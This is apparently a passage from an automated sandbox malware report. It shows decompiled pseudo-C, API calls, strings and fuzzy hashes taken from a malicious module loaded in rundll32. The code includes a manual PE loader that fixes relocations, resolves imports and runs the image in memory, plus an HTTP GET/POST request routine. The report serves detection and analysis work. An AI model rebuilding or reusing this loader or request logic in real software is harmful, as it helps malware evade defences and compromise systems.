Download Yara Rule

C-Code - Quality: 30%

			E04953175(intOrPtr* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char _v16;
				_Unknown_base(*)()* _t15;
				void* _t20;
				intOrPtr* _t25;
				intOrPtr* _t29;
				struct HINSTANCE__* _t30;

				_v8 = _v8 & 0x00000000;
				_t30 = GetModuleHandleW(L"advapi32.dll");
				if(_t30 == 0) {
					L7:
					return 1;
				}
				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
				if(_t25 == 0) {
					goto L7;
				}
				_t15 = GetProcAddress(_t30, "CryptGenRandom");
				_v12 = _t15;
				if(_t15 == 0) {
					goto L7;
				}
				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
				if(_t29 == 0) {
					goto L7;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if( *_t25() == 0) {
					goto L7;
				}
				_t20 = _v12(_v8, 4,  &_v16);
				 *_t29(_v8, 0);
				if(_t20 == 0) {
					goto L7;
				}
				 *_a4 = E049530D0( &_v16);
				return 0;
			}

0x0495317b
0x0495318d
0x04953191
0x04953205
0x00000000
0x04953207
0x049531a1
0x049531a5
0x00000000
0x00000000
0x049531ad
0x049531af
0x049531b4
0x00000000
0x00000000
0x049531be
0x049531c2
0x00000000
0x00000000
0x049531c4
0x049531c9
0x049531cb
0x049531cd
0x049531d2
0x049531d7
0x00000000
0x00000000
0x049531e2
0x049531ec
0x049531f0
0x00000000
0x00000000
0x049531ff
0x00000000

APIs

GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,?,0494818C,00000000), ref: 04953187
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 0495319F
GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 049531AD
GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 049531BC

Strings

CryptAcquireContextA, xrefs: 04953199
advapi32.dll, xrefs: 04953182
CryptReleaseContext, xrefs: 049531B6
CryptGenRandom, xrefs: 049531A7

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: 85da492e44f41ff98205f1cfb0b5c37e549e3106d68781cbae17604e7b8b1ca3
Instruction ID: 66f9e8c1a1929da2e700770904c038edb84f62c73f2156eaf5ec140074a2ed25
Opcode Fuzzy Hash: 85da492e44f41ff98205f1cfb0b5c37e549e3106d68781cbae17604e7b8b1ca3
Instruction Fuzzy Hash: F811A932A44719B7DB31D6B4AC45F9EBBAC9F44790F310175ED00E7150EB71EA048B58

Uniqueness

Uniqueness Score: -1.00%

Function 0494F03B Relevance: 13.8, APIs: 7, Strings: 2, Instructions: 278
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0494F03B(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				char _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t91;
				intOrPtr _t99;
				intOrPtr* _t101;
				intOrPtr _t106;
				signed int _t107;
				void* _t108;
				intOrPtr _t109;
				signed int _t110;
				intOrPtr _t112;
				char _t114;
				intOrPtr _t119;
				intOrPtr _t126;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t138;
				char _t142;
				intOrPtr _t144;
				void* _t154;
				signed int _t156;
				intOrPtr _t162;
				intOrPtr _t167;
				signed int _t168;
				signed int _t176;
				char _t182;
				signed int _t183;
				void* _t184;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				char _t189;
				void* _t190;
				void* _t191;
				intOrPtr* _t193;

				_t157 = __ecx;
				_v40 = _v40 & 0x00000000;
				_t184 = __edx;
				_v24 = __ecx;
				_v32 = 4;
				_v36 = 1;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_t193 = _t191 + 0x18;
				_v64 = E049490CA(_t157, 0x503);
				 *_t193 = 0x14ee;
				_v60 = E049490CA(_t157);
				 *_t193 = 0x18a;
				_v56 = E049490CA(_t157);
				 *_t193 = 0x128f;
				_v52 = E049490CA(_t157);
				 *_t193 = 0xe8b;
				_t91 = E049490CA(_t157);
				_v44 = _v44 & 0;
				_t182 = 0x3c;
				_v48 = _t91;
				E049492A2( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t182;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E0494CE25(_t184));
				_t99 =  *0x4960fb8; // 0x0
				_push(_t184);
				if( *((intOrPtr*)(_t99 + 0x28))() != 0) {
					_t176 = 0;
					__eflags = 0;
					_v28 = 0;
					do {
						_t101 =  *0x4960fb8; // 0x0
						_v12 = 0x8404f700;
						_t183 =  *_t101( *0x49610c8,  *((intOrPtr*)(_t190 + _t176 * 4 - 0x24)), 0, 0, 0);
						__eflags = _t183;
						if(_t183 != 0) {
							E0494EFD3(_t183);
							_t106 =  *0x4960fb8; // 0x0
							_t107 =  *((intOrPtr*)(_t106 + 0x1c))(_t183,  &_v396, _v100, 0, 0, 3, 0, 0);
							__eflags = _a24;
							_t156 = _t107;
							if(_a24 != 0) {
								E0494C2D1(_a24);
							}
							__eflags = _t156;
							if(_t156 != 0) {
								__eflags = _v112 - 4;
								_t162 = 0x8484f700;
								if(_v112 != 4) {
									_t162 = _v12;
								}
								__eflags = _v24 - 2;
								_t108 = 0x495df0c;
								if(_v24 != 2) {
									_t108 = 0x495df14;
								}
								_t164 =  &_v652;
								_t109 =  *0x4960fb8; // 0x0
								_t110 =  *((intOrPtr*)(_t109 + 0x20))(_t156, _t108,  &_v652, 0, 0,  &_v64, _t162, 0);
								__eflags = _a24;
								_t186 = _t110;
								_v8 = _t186;
								if(_a24 != 0) {
									_t164 = _a24;
									E0494C2D1(_a24);
								}
								__eflags = _t186;
								if(_t186 != 0) {
									__eflags = _v112 - 4;
									if(_v112 == 4) {
										_t164 = _t186;
										E0494EF81(_t186);
									}
									__eflags = _v24 - 2;
									if(_v24 != 2) {
										__eflags = 0;
										_t112 =  *0x4960fb8; // 0x0
										_v12 =  *((intOrPtr*)(_t112 + 0x24))(_t186, 0, 0, 0, 0);
									} else {
										_t142 = E049490CA(_t164, 0xfb3);
										_t189 = _t142;
										_v16 = _t189;
										_t144 =  *0x4960fb8; // 0x0
										_t186 = _v8;
										_v12 =  *((intOrPtr*)(_t144 + 0x24))(_t186, _t189, E0494CE25(_t189), _a4, _a8);
										E04949D4C( &_v16);
									}
									__eflags = _a24;
									if(_a24 != 0) {
										E0494C2D1(_a24);
									}
									__eflags = _v12;
									if(_v12 != 0) {
										L31:
										_t114 = 8;
										_v32 = _t114;
										_v20 = 0;
										_v16 = 0;
										E049492A2( &_v20, 0, _t114);
										_t119 =  *0x4960fb8; // 0x0
										__eflags =  *((intOrPtr*)(_t119 + 0xc))(_t186, 0x13,  &_v20,  &_v32, 0);
										if(__eflags != 0) {
											_t187 = E0494C1E4( &_v20, __eflags);
											__eflags = _t187 - 0xc8;
											if(_t187 == 0xc8) {
												 *_a20 = _v8;
												 *_a12 = _t183;
												 *_a16 = _t156;
												__eflags = 0;
												return 0;
											}
											_t188 =  ~_t187;
											L35:
											_t126 =  *0x4960fb8; // 0x0
											 *((intOrPtr*)(_t126 + 8))(_v8);
											L36:
											__eflags = _t156;
											if(_t156 != 0) {
												_t130 =  *0x4960fb8; // 0x0
												 *((intOrPtr*)(_t130 + 8))(_t156);
											}
											__eflags = _t183;
											if(_t183 != 0) {
												_t167 =  *0x4960fb8; // 0x0
												 *((intOrPtr*)(_t167 + 8))(_t183);
											}
											return _t188;
										}
										GetLastError();
										_t188 = 0xfffffff8;
										goto L35;
									} else {
										GetLastError();
										_t134 =  *0x4960fb8; // 0x0
										 *((intOrPtr*)(_t134 + 8))(_t186);
										_t186 = 0;
										__eflags = 0;
										goto L26;
									}
								} else {
									GetLastError();
									L26:
									_t136 =  *0x4960fb8; // 0x0
									 *((intOrPtr*)(_t136 + 8))(_t156);
									_t156 = 0;
									__eflags = 0;
									goto L27;
								}
							} else {
								GetLastError();
								L27:
								_t138 =  *0x4960fb8; // 0x0
								 *((intOrPtr*)(_t138 + 8))(_t183);
								_t183 = 0;
								__eflags = 0;
								goto L28;
							}
						}
						GetLastError();
						L28:
						_t168 = _t186;
						_t176 = _v28 + 1;
						_v28 = _t176;
						__eflags = _t176 - 2;
					} while (_t176 < 2);
					_v8 = _t186;
					__eflags = _t168;
					if(_t168 != 0) {
						goto L31;
					}
					_t188 = 0xfffffffe;
					goto L36;
				}
				_t154 = 0xfffffffc;
				return _t154;
			}

0x0494f03b
0x0494f044
0x0494f051
0x0494f053
0x0494f05b
0x0494f064
0x0494f070
0x0494f081
0x0494f086
0x0494f093
0x0494f096
0x0494f0a2
0x0494f0a5
0x0494f0b1
0x0494f0b4
0x0494f0c0
0x0494f0c3
0x0494f0ca
0x0494f0cf
0x0494f0d5
0x0494f0d7
0x0494f0df
0x0494f0ea
0x0494f0f1
0x0494f0fd
0x0494f100
0x0494f10e
0x0494f111
0x0494f117
0x0494f118
0x0494f11a
0x0494f123
0x0494f124
0x0494f129
0x0494f12f
0x0494f139
0x0494f139
0x0494f13b
0x0494f140
0x0494f140
0x0494f14f
0x0494f15e
0x0494f160
0x0494f162
0x0494f171
0x0494f188
0x0494f18e
0x0494f191
0x0494f195
0x0494f197
0x0494f19c
0x0494f19c
0x0494f1a1
0x0494f1a3
0x0494f1b0
0x0494f1b4
0x0494f1b9
0x0494f1bb
0x0494f1bb
0x0494f1be
0x0494f1c2
0x0494f1c7
0x0494f1c9
0x0494f1c9
0x0494f1d8
0x0494f1e0
0x0494f1e6
0x0494f1e9
0x0494f1ed
0x0494f1ef
0x0494f1f2
0x0494f1f4
0x0494f1f7
0x0494f1f7
0x0494f1fc
0x0494f1fe
0x0494f20b
0x0494f20f
0x0494f211
0x0494f213
0x0494f213
0x0494f218
0x0494f21c
0x0494f258
0x0494f25e
0x0494f267
0x0494f21e
0x0494f223
0x0494f22c
0x0494f231
0x0494f23c
0x0494f242
0x0494f249
0x0494f250
0x0494f255
0x0494f26a
0x0494f26e
0x0494f273
0x0494f273
0x0494f278
0x0494f27c
0x0494f2c5
0x0494f2c7
0x0494f2ca
0x0494f2d2
0x0494f2d6
0x0494f2d9
0x0494f2eb
0x0494f2f6
0x0494f2f8
0x0494f30d
0x0494f30f
0x0494f315
0x0494f34a
0x0494f34f
0x0494f354
0x0494f356
0x00000000
0x0494f356
0x0494f317
0x0494f319
0x0494f319
0x0494f322
0x0494f325
0x0494f325
0x0494f327
0x0494f329
0x0494f32f
0x0494f32f
0x0494f332
0x0494f334
0x0494f336
0x0494f33d
0x0494f33d
0x00000000
0x0494f340
0x0494f2fa
0x0494f302
0x00000000
0x0494f27e
0x0494f27e
0x0494f284
0x0494f28a
0x0494f28d
0x0494f28d
0x00000000
0x0494f28d
0x0494f200
0x0494f200
0x0494f28f
0x0494f28f
0x0494f295
0x0494f298
0x0494f298
0x00000000
0x0494f298
0x0494f1a5
0x0494f1a5
0x0494f29a
0x0494f29a
0x0494f2a0
0x0494f2a3
0x0494f2a3
0x00000000
0x0494f2a3
0x0494f1a3
0x0494f164
0x0494f2a5
0x0494f2a8
0x0494f2aa
0x0494f2ad
0x0494f2b0
0x0494f2b0
0x0494f2b9
0x0494f2bc
0x0494f2be
0x00000000
0x00000000
0x0494f2c2
0x00000000
0x0494f2c2
0x0494f133
0x00000000

APIs

memset.MSVCRT ref: 0494F070
memset.MSVCRT ref: 0494F081

Part of subcall function 049492A2: memset.MSVCRT ref: 049492B4

GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 0494F164

Strings

POST, xrefs: 0494F1C2
GET, xrefs: 0494F1C9, 0494F1DF

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: memset$ErrorLast
String ID: GET$POST
API String ID: 2570506013-3192705859
Opcode ID: 80017aa4eefa84ffdfeba40915a1460153c339acb858cbd5e5e5a71203bbc4c2
Instruction ID: b4d9586662c4fcaf91491938e4c29b1f34b0421b150c82de472e3784c1f50e1d
Opcode Fuzzy Hash: 80017aa4eefa84ffdfeba40915a1460153c339acb858cbd5e5e5a71203bbc4c2
Instruction Fuzzy Hash: F3A13EB1900219AFEB54DFA4D884EAEBBB9EF88314F108179E515E7290DB74AD41CF60

Uniqueness

Uniqueness Score: -1.00%

Function 04951CE9 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 04951D69
qsort.MSVCRT ref: 04951FE7

Strings

false, xrefs: 04951D4C
null, xrefs: 04951D2E
%I64d, xrefs: 04951D5B
true, xrefs: 04951D40

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: 51fe04ca20614e680997fe2d3cde8b79793953148360f0f2ae966d212bfdc661
Instruction ID: 840d90d88f07885b382febde20bc29e041df92f91cdd571155f3a2efe9527c5c
Opcode Fuzzy Hash: 51fe04ca20614e680997fe2d3cde8b79793953148360f0f2ae966d212bfdc661
Instruction Fuzzy Hash: 82E14A7190020ABBEF11EF64DC86FAB3B7DEF84344F204479FD1596160E675AA618BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04954646 Relevance: 9.3, APIs: 6, Instructions: 329
libraryloaderstringCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E04954646(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				signed int* _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed short* _v52;
				intOrPtr _v56;
				unsigned int _v60;
				intOrPtr _v64;
				_Unknown_base(*)()* _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				CHAR* _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _t220;
				signed int _t237;
				void* _t277;
				signed int _t282;
				signed int _t284;
				intOrPtr _t324;

				_v44 = _v44 & 0x00000000;
				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v20 = _v84;
				_t324 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
				_v64 = _t324;
				if(_t324 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
						L35:
						if(_a16 == 0) {
							L54:
							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
							while(0 != 0) {
							}
							if(_a12 != 0) {
								 *_a12 = _v80;
							}
							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
							E049543F4(GetCurrentProcess(),  *0x4960fe4, _t203, _a4, _a4);
							_v124 = _v80(_a4, 1, _a8);
							while(0 != 0) {
							}
							if(_v124 != 0) {
								if(_v44 == 0) {
									L77:
									return 1;
								}
								if(_a20 != 1) {
									if(_a20 != 2) {
										L75:
										while(0 != 0) {
										}
										goto L77;
									}
									while(0 != 0) {
									}
									_v132 = _v44;
									goto L75;
								}
								while(0 != 0) {
								}
								_v44();
								goto L75;
							}
							while(0 != 0) {
							}
							return 0;
						}
						while(0 != 0) {
						}
						_push(8);
						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
							goto L54;
						}
						_v128 = 0x80000000;
						_t220 = 8;
						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t220 * 0));
						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
						_v104 =  *((intOrPtr*)(_v76 + 0x18));
						while(0 != 0) {
						}
						_v40 = _v40 & 0x00000000;
						while(_v40 < _v104) {
							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
							if(lstrcmpA(_v116, _a16) != 0) {
								_v40 = _v40 + 1;
								continue;
							}
							while(0 != 0) {
							}
							_v44 = _v120;
							break;
						}
						if(_v44 != 0) {
							goto L54;
						}
						while(0 != 0) {
						}
						return 0xffffffff;
					}
					_v96 = 0x80000000;
					_t237 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t237 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v24 =  *_v16 + _a4;
							}
							_v72 = _v72 & 0x00000000;
							while( *_v24 != 0) {
								if(( *_v24 & _v96) == 0) {
									_v100 =  *_v24 + _a4;
									_v68 = GetProcAddress(_v36, _v100 + 2);
								} else {
									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v24 = _v68;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
								}
								_v24 =  &(_v24[1]);
								_v72 = _v72 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t277 = 0xfffffffd;
							return _t277;
						}
					}
					goto L35;
				}
				_t282 = 8;
				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t282 * 5));
				_t284 = 8;
				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t284 * 5));
				while(0 != 0) {
				}
				while(_v56 > 0) {
					_v28 = _v52[2];
					_v56 = _v56 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v52[4]);
					_v92 = _a4 +  *_v52;
					_v60 = _v28;
					while(1) {
						_v88 = _v60;
						_v60 = _v60 - 1;
						if(_v88 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v48 = (_v12 & 0x0000ffff) + _v92;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v64;
							}
						} else {
							 *_v48 =  *_v48 + _v64;
						}
						_v32 =  &(_v32[1]);
					}
					_v52 = _v32;
				}
				goto L13;
			}

0x0495464f
0x0495465c
0x04954662
0x0495466b
0x0495466e
0x04954671
0x00000000
0x04954762
0x04954766
0x04954768
0x04954776
0x04954894
0x04954898
0x04954960
0x04954969
0x0495496c
0x04954970
0x04954976
0x0495497e
0x0495497e
0x04954986
0x0495499c
0x049549af
0x049549b2
0x049549b6
0x049549bc
0x049549cc
0x049549f7
0x00000000
0x049549f9
0x049549d2
0x049549e3
0x00000000
0x049549f1
0x049549f5
0x00000000
0x049549f1
0x049549e5
0x049549e9
0x049549ee
0x00000000
0x049549ee
0x049549d4
0x049549d8
0x049549da
0x00000000
0x049549da
0x049549be
0x049549c2
0x00000000
0x049549c4
0x0495489e
0x049548a2
0x049548a4
0x049548b2
0x00000000
0x00000000
0x049548b8
0x049548c1
0x049548cf
0x049548db
0x049548e7
0x049548f0
0x049548f3
0x049548f7
0x049548f9
0x04954906
0x0495491a
0x04954929
0x0495493a
0x04954903
0x00000000
0x04954903
0x0495493c
0x04954940
0x04954945
0x00000000
0x04954945
0x04954950
0x00000000
0x00000000
0x04954952
0x04954956
0x00000000
0x04954958
0x0495477c
0x04954785
0x04954793
0x04954796
0x049547b3
0x049547ba
0x049547cc
0x049547cc
0x049547d3
0x049547e3
0x049547fb
0x049547e5
0x049547ed
0x049547ed
0x049547fe
0x04954802
0x04954812
0x04954835
0x04954847
0x04954814
0x04954828
0x04954828
0x04954851
0x0495486d
0x04954853
0x04954862
0x04954862
0x04954875
0x0495487e
0x0495487e
0x0495488c
0x00000000
0x049547d5
0x049547d7
0x00000000
0x049547d7
0x049547d3
0x00000000
0x04954796
0x04954679
0x04954687
0x0495468c
0x04954697
0x0495469a
0x0495469e
0x049546a0
0x049546b0
0x049546b9
0x049546c2
0x049546ca
0x049546d3
0x049546de
0x049546e4
0x049546e7
0x049546ea
0x049546f1
0x049546f8
0x00000000
0x00000000
0x04954703
0x04954711
0x0495471c
0x04954726
0x0495473e
0x0495474b
0x0495474b
0x04954728
0x04954733
0x04954733
0x04954752
0x04954752
0x0495475a
0x0495475a
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 049547AD
LoadLibraryA.KERNEL32(00000000), ref: 049547C6
GetProcAddress.KERNEL32(00000000,?), ref: 04954822
GetProcAddress.KERNEL32(00000000,?), ref: 04954841
lstrcmpA.KERNEL32(?,00000000), ref: 04954932
GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0495498F

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: AddressProc$CurrentHandleLibraryLoadModuleProcesslstrcmp
String ID:
API String ID: 2598995400-0
Opcode ID: 67320c67cde3e5274d8823e49bdbae8026716618043c17a0e48217e47673f805
Instruction ID: 48b9283a0b63f90ab90b6e275ba4b9327b79da3b9ca9fe1b4dacf1dea5a22ee8
Opcode Fuzzy Hash: 67320c67cde3e5274d8823e49bdbae8026716618043c17a0e48217e47673f805
Instruction Fuzzy Hash: 6FE1BF75A00209DFCB94CFA8C891BADBBB5FF48314F248569E915AB360D734A981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0494D2F3 Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 0494D307
SysAllocString.OLEAUT32(?), ref: 0494D30F
SysAllocString.OLEAUT32(00000000), ref: 0494D323
SysFreeString.OLEAUT32(?), ref: 0494D39E
SysFreeString.OLEAUT32(?), ref: 0494D3A1
SysFreeString.OLEAUT32(?), ref: 0494D3A6

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: cb4438306000f579200a4e3faaeed5baa994eee9722b598902c92a8ad090686c
Instruction ID: 91f20163bf94ffc314fcb9aa9c748149020831180617c4e9d53ffcf8f46dcf70
Opcode Fuzzy Hash: cb4438306000f579200a4e3faaeed5baa994eee9722b598902c92a8ad090686c
Instruction Fuzzy Hash: 9C21FDB5900218BFDB00DFA5CC88DAFBBBDEF89758B1045AAF505E7250D675AE01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0495222E Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

@, xrefs: 0495229C
\u%04X\u%04X, xrefs: 04952387
\u%04X, xrefs: 04952348

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: 79d35d2da01486359e99486d8a111a28fd57f82cc0967fae1c5b288eecedaf17
Instruction ID: 8ee92259bba25ce0aa969ee98ae9254229e784cc1c021180fd8c786167a417ff
Opcode Fuzzy Hash: 79d35d2da01486359e99486d8a111a28fd57f82cc0967fae1c5b288eecedaf17
Instruction Fuzzy Hash: 17410431700205A7EB28DF69AC89BBE3A59DF44B14F3405B5FD02E6274E271F9908F92

Uniqueness

Uniqueness Score: -1.00%

Function 04953BFE Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E04953BFE(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				signed int _t23;
				void* _t30;
				char* _t31;
				char* _t33;
				char* _t35;
				char* _t37;
				char* _t38;
				long long* _t40;

				_t30 = __edi;
				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t35 = _a4;
				_push(_t25);
				 *_t40 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t35);
				L04953D57();
				_t23 = _t12;
				if(_t23 < 0 || _t23 >= _a8) {
					L16:
					_t13 = _t12 | 0xffffffff;
					goto L17;
				} else {
					E04953BD7(_t12, _t35);
					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
						L8:
						_push(_t30);
						_t37 = strchr(_t35, 0x65);
						_t31 = _t37;
						if(_t37 == 0) {
							L15:
							_t13 = _t23;
							L17:
							return _t13;
						}
						_t38 = _t37 + 1;
						_t33 = _t31 + 2;
						if( *_t38 == 0x2d) {
							_t38 = _t33;
						}
						while( *_t33 == 0x30) {
							_t33 = _t33 + 1;
						}
						if(_t33 != _t38) {
							E04949227(_t38, _t33, _t23 - _t33 + _a4);
							_t23 = _t23 + _t38 - _t33;
						}
						goto L15;
					} else {
						_t6 = _t23 + 3; // 0x49523e9
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L16;
						}
						_t35[_t23] = 0x302e;
						( &(_t35[2]))[_t23] = 0;
						_t23 = _t23 + 2;
						goto L8;
					}
				}
			}

0x04953bfe
0x04953c01
0x04953c06
0x04953c0a
0x04953c0a
0x04953c10
0x04953c14
0x04953c15
0x04953c18
0x04953c19
0x04953c1e
0x04953c21
0x04953c22
0x04953c27
0x04953c2e
0x04953cb7
0x04953cb7
0x00000000
0x04953c39
0x04953c3a
0x04953c4c
0x04953c72
